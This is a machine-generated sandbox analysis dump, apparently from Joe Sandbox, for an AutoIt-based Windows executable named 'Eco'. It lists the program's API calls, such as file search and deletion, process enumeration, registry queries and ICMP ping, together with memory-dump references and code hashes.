                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                          • String ID:
                          • API String ID: 1986165174-0
                          • Opcode ID: e4f59942ab11b3dbd885bfdd2d66f63f4701e30152ca42882756b638d221557c
                          • Instruction ID: e2415cd53889832803dee360d0e6755d5280ee0bd067b82086ef8b1dbd2094ed
                          • Opcode Fuzzy Hash: e4f59942ab11b3dbd885bfdd2d66f63f4701e30152ca42882756b638d221557c
                          • Instruction Fuzzy Hash: 4F918131549BD0DECB31CB7894545ABFFE5BF3A300B884A9ED0C697A81E230A648D759

                          Control-flow Graph

                          APIs
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                            • Part of subcall function 00574E59: GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00573EE9
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00573F39
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00573F4A
                          • FindClose.KERNEL32(00000000), ref: 00573F61
                          • FindClose.KERNEL32(00000000), ref: 00573F6A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                          • String ID: \*.*
                          • API String ID: 2649000838-1173974218
                          • Opcode ID: ad169d24dcfaf16af13c470e7f4189443553b0fe8ae4cb5e15586100685619a2
                          • Instruction ID: da6c1b9ed9f90b132aad784eccaa9c91cc6f7870a8c8c9a3d5123c9b3b03c196
                          • Opcode Fuzzy Hash: ad169d24dcfaf16af13c470e7f4189443553b0fe8ae4cb5e15586100685619a2
                          • Instruction Fuzzy Hash: 7331A4750183569BC300EF64E8999AFBBA8BEE2310F404E1DF4D5921D1DB24DA08E756
                          APIs
                            • Part of subcall function 00523740: CharUpperBuffW.USER32(?,005D61DC,00000001,?,00000000,005D61DC,?,005153A5,?,?,?,?), ref: 0052375D
                          • _memmove.LIBCMT ref: 0051B68A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharUpper_memmove
                          • String ID: pr]
                          • API String ID: 2819905725-2741208959
                          • Opcode ID: af474c46dd024adce50c02d3b3825844badb55a4dc74a6a88ba44371cb551784
                          • Instruction ID: 5d7af61a5e44db4f10b03ee4e5c9073cfc825f96721f464869d9184f4c374884
                          • Opcode Fuzzy Hash: af474c46dd024adce50c02d3b3825844badb55a4dc74a6a88ba44371cb551784
                          • Instruction Fuzzy Hash: F8A26974608741DFE720DF14C494BAABBE1BF88304F14895EE89A8B361D771ED85CB92
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00573FDA
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00573FE8
                          • Process32NextW.KERNEL32(00000000,?), ref: 00574008
                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 005740B2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3243318325-0
                          • Opcode ID: ca88f6cad6991e0dec1466decba1a0be333195da85225403d59d7a7e936a1bf2
                          • Instruction ID: 42fbd3b86ff7e16cda3dfe377e1891db5f2280ae9965f1e2ded5a911021f7150
                          • Opcode Fuzzy Hash: ca88f6cad6991e0dec1466decba1a0be333195da85225403d59d7a7e936a1bf2
                          • Instruction Fuzzy Hash: 753159711043019FD304EF54D889AAFBFE8BFE5350F40492DF585861E1EB719949DB92
                          APIs
                          • GetFileAttributesW.KERNEL32(?,0055FC06), ref: 005747C7
                          • FindFirstFileW.KERNEL32(?,?), ref: 005747D8
                          • FindClose.KERNEL32(00000000), ref: 005747E8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirst
                          • String ID:
                          • API String ID: 48322524-0
                          • Opcode ID: 78ca5b3ab1c18e61667bb183bfc1acd8210776c32b89bb2f54eb3bed56625243
                          • Instruction ID: 51e28341481c442daea08045a0cee0d3fb5f0d5c509f20f63158269df4bcccbf
                          • Opcode Fuzzy Hash: 78ca5b3ab1c18e61667bb183bfc1acd8210776c32b89bb2f54eb3bed56625243
                          • Instruction Fuzzy Hash: AFE0D8314206119743146738FC4D4EA3B5CEE17335F108B15F536C11D0EB709D47A995
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c2e7a9d5460390462121cfffb20df9f6ebecb70992d5a227431e83f3bfc2c0e4
                          • Instruction ID: 80fc8a539a433fce1d19277d1b53f063068c01585e0b160aa1dd2cc1d2e683c7
                          • Opcode Fuzzy Hash: c2e7a9d5460390462121cfffb20df9f6ebecb70992d5a227431e83f3bfc2c0e4
                          • Instruction Fuzzy Hash: C722AF74A00206DFEB24DF54C4A4AEEBBF1FF45300F14846AE856AB391E734A9C5CB91
                          APIs
                          • FindCloseChangeNotification.KERNEL32 ref: 00530E05
                          • NtResumeThread.NTDLL ref: 00530E17
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotificationResumeThread
                          • String ID:
                          • API String ID: 177874822-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: abe712e57487a4fc5b464327eac429f794525a619fb04cf16b62995c75c2749a
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: FE31D474A00205DBCB58DF58C4A0969FBA6FB49310F689AA5E40ACF296D730EDD1DBC0
                          APIs
                          • timeGetTime.WINMM ref: 0051BF57
                            • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                          • Sleep.KERNEL32(0000000A,?,?), ref: 005535E5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePeekSleepTimetime
                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL$pr]$pr]$pr]$pr]
                          • API String ID: 1792118007-2847968208
                          • Opcode ID: c4067e18ebab6985b10902cfc64ac3bda47aae036fc1ef8a2337d687395c9043
                          • Instruction ID: 89ed209b1ab9d307e17ea1df5b4b3082b121ca11c42adc3c8732d6d9c3b1db2e
                          • Opcode Fuzzy Hash: c4067e18ebab6985b10902cfc64ac3bda47aae036fc1ef8a2337d687395c9043
                          • Instruction Fuzzy Hash: 1DC29370508342DFE724DF24C858BAABFE4BF85344F14491EF899972A1D771E989CB82

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00513444
                          • RegisterClassExW.USER32(00000030), ref: 0051346E
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                          • InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                          • LoadIconW.USER32(000000A9), ref: 005134C2
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: 6227f1f0e391864e34b9b0a33b919ce3ae11f88e520940675b69e707aeea10b5
                          • Instruction ID: 5b30006e212f2295e0c4e82f6d6fb54350564b8f4723181991aa9ba482d60b82
                          • Opcode Fuzzy Hash: 6227f1f0e391864e34b9b0a33b919ce3ae11f88e520940675b69e707aeea10b5
                          • Instruction Fuzzy Hash: 3C315C70855309AFDB50CFA4DC88ADD7FF0FB19310F10415AF540A62A0D3B5054ADF51

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00513444
                          • RegisterClassExW.USER32(00000030), ref: 0051346E
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                          • InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                          • LoadIconW.USER32(000000A9), ref: 005134C2
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: 745863b67f0596b15bdde9b24f4d45fd0a973e5b8c88d2d7506ed1cf3869fbe3
                          • Instruction ID: 1a6fc76824f309a6b5340ac9186b926ef37df4b3dd726fdd475d662ebba21309
                          • Opcode Fuzzy Hash: 745863b67f0596b15bdde9b24f4d45fd0a973e5b8c88d2d7506ed1cf3869fbe3
                          • Instruction Fuzzy Hash: 6121E3B1911218AFEB109FA4E888B9EBBF4FB19700F00511BF511A62A0D7B11549EF91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0052FFFA: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00523094), ref: 00530018
                            • Part of subcall function 005307EC: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0052309F), ref: 0053080E
                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005230E2
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0056013A
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0056017B
                          • RegCloseKey.ADVAPI32(?), ref: 005601B9
                          • _wcscat.LIBCMT ref: 00560212
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                          • API String ID: 2673923337-2727554177
                          • Opcode ID: 7bf9d4f85ab64357cc5dda49299f563e1f5eec61a11894220772cd59b1e5444b
                          • Instruction ID: afd83a14e63291ab96b4384b89e6413bba437ee0747bced6a04eb3a69a67adee
                          • Opcode Fuzzy Hash: 7bf9d4f85ab64357cc5dda49299f563e1f5eec61a11894220772cd59b1e5444b
                          • Instruction Fuzzy Hash: 42716D754093569EC324EF25EC5996BBFE8FFA9340F80092FF445932A0EB309948DB95

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00525156
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00525165
                          • LoadIconW.USER32(00000063), ref: 0052517C
                          • LoadIconW.USER32(000000A4), ref: 0052518E
                          • LoadIconW.USER32(000000A2), ref: 005251A0
                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
                          • RegisterClassExW.USER32(?), ref: 0052521C
                            • Part of subcall function 00513411: GetSysColorBrush.USER32(0000000F), ref: 00513444
                            • Part of subcall function 00513411: RegisterClassExW.USER32(00000030), ref: 0051346E
                            • Part of subcall function 00513411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                            • Part of subcall function 00513411: InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                            • Part of subcall function 00513411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                            • Part of subcall function 00513411: LoadIconW.USER32(000000A9), ref: 005134C2
                            • Part of subcall function 00513411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$AutoIt v3
                          • API String ID: 423443420-4155596026
                          • Opcode ID: db00d5c77bbaf5fe677f10e98c5cf109db566d0212862cc343beda35e558c3d4
                          • Instruction ID: 2aca9dd3e4651bd6159cae459161c4d2e30c4db6327acd7541235c85005349b8
                          • Opcode Fuzzy Hash: db00d5c77bbaf5fe677f10e98c5cf109db566d0212862cc343beda35e558c3d4
                          • Instruction Fuzzy Hash: 4C216874D12308AFEB209FA4EC19B9D7FB4FB29311F00012BE504A62E0D3B65559EF81

                          Control-flow Graph

                          • Control-flow graph image omitted; recoverable data from the text dump: function starting at 585be2 (graph nodes 924 to 977), whose blocks call WSAStartup, inet_addr, gethostbyname, IcmpCreateFile, IcmpSendEcho, IcmpCloseHandle and WSACleanup. The Executed / Not Executed colouring of the graph is not recoverable.
                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00585C43
                          • inet_addr.WSOCK32(?,?,?), ref: 00585C88
                          • gethostbyname.WS2_32(?), ref: 00585C94
                          • IcmpCreateFile.IPHLPAPI ref: 00585CA2
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585D12
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00585D28
                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00585D9D
                          • WSACleanup.WSOCK32 ref: 00585DA3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 4b19a1e4ec6cee81364acc3889acc2bc2aa6f002e739800ebf1c88f230630654
                          • Instruction ID: a892cb43a2c8a1086e42ae39c6d7951c46f7b6312feb17685e304c499ee6b034
                          • Opcode Fuzzy Hash: 4b19a1e4ec6cee81364acc3889acc2bc2aa6f002e739800ebf1c88f230630654
                          • Instruction Fuzzy Hash: A1514A716047019FDB20AF24DC49B6ABBE4BF89710F044929F956AB2E1EB30ED459F81

                          Control-flow Graph

                          • Control-flow graph image omitted; recoverable data from the text dump: function starting at 524d83 (graph nodes 978 to 1029), whose blocks call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus. The Executed / Not Executed colouring of the graph is not recoverable.
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?), ref: 00524E22
                          • KillTimer.USER32(?,00000001), ref: 00524E4C
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00524E6F
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00524E7A
                          • CreatePopupMenu.USER32 ref: 00524E8E
                          • PostQuitMessage.USER32(00000000), ref: 00524EAF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                          • String ID: TaskbarCreated
                          • API String ID: 129472671-2362178303
                          • Opcode ID: 8ff37ae5887bc5d24885df1a48202462e4b3c2e65293840fb38cbc6af8e896a3
                          • Instruction ID: 061fde5774f36b60240dbc5e1224e83e9041f6e067b2cb4e81c490c90b14dca9
                          • Opcode Fuzzy Hash: 8ff37ae5887bc5d24885df1a48202462e4b3c2e65293840fb38cbc6af8e896a3
                          • Instruction Fuzzy Hash: E341F531215129ABFF255F28BC09B7E3F99FF52300F05052BF502922E1DBB0AC55AB62

                          Control-flow Graph

                          • Control-flow graph image omitted; recoverable data from the text dump: function starting at 51ad98 (graph nodes 1035 to 1144), whose blocks call mciSendStringW, OleUninitialize, UnregisterHotKey, DestroyWindow, FindClose, FreeLibrary and VirtualFree. The Executed / Not Executed colouring of the graph is not recoverable.
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0051ADE1
                          • OleUninitialize.OLE32(?,00000000), ref: 0051AE80
                          • UnregisterHotKey.USER32(?), ref: 0051AFD7
                          • DestroyWindow.USER32(?), ref: 00552E94
                          • FreeLibrary.KERNEL32(?), ref: 00552EF9
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00552F26
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: fc3dd6f3bdef311bc96863936918f314fe05898e5ec8721edb81b8dc3d1fc105
                          • Instruction ID: de60f77841b74f5a44908693832354b848a6e222888c757d766d8d124fa2eec0
                          • Opcode Fuzzy Hash: fc3dd6f3bdef311bc96863936918f314fe05898e5ec8721edb81b8dc3d1fc105
                          • Instruction Fuzzy Hash: C9A19134702213CFDB29EF10D4A9A69FB64FF55701F1046ADE80AAB291CB31AD56CF91

                          Control-flow Graph

                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00560BDB
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • _memset.LIBCMT ref: 00525787
                          • _wcscpy.LIBCMT ref: 005257DB
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
                          • __swprintf.LIBCMT ref: 00560C51
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                          • String ID: Line %d: $2#2#$AutoIt -
                          • API String ID: 230667853-2022516920
                          • Opcode ID: 26bf8f83cf9cbb7228390a395c325147589cd47e015360a460685c151034deb2
                          • Instruction ID: d8243785974a1f0be6b28bb9f67b332c0012febe1ceff35d97a199ebac99091a
                          • Opcode Fuzzy Hash: 26bf8f83cf9cbb7228390a395c325147589cd47e015360a460685c151034deb2
                          • Instruction Fuzzy Hash: 4F41C671008711AAC321EB60EC49BEF7FECBFA5354F04461EF185920E1EB309649CB96

                          Control-flow Graph

                          APIs
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530717
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(00000010,00000000), ref: 0053071F
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(000000A0,00000000), ref: 0053072A
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00530735
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(00000011,00000000), ref: 0053073D
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(00000012,00000000), ref: 00530745
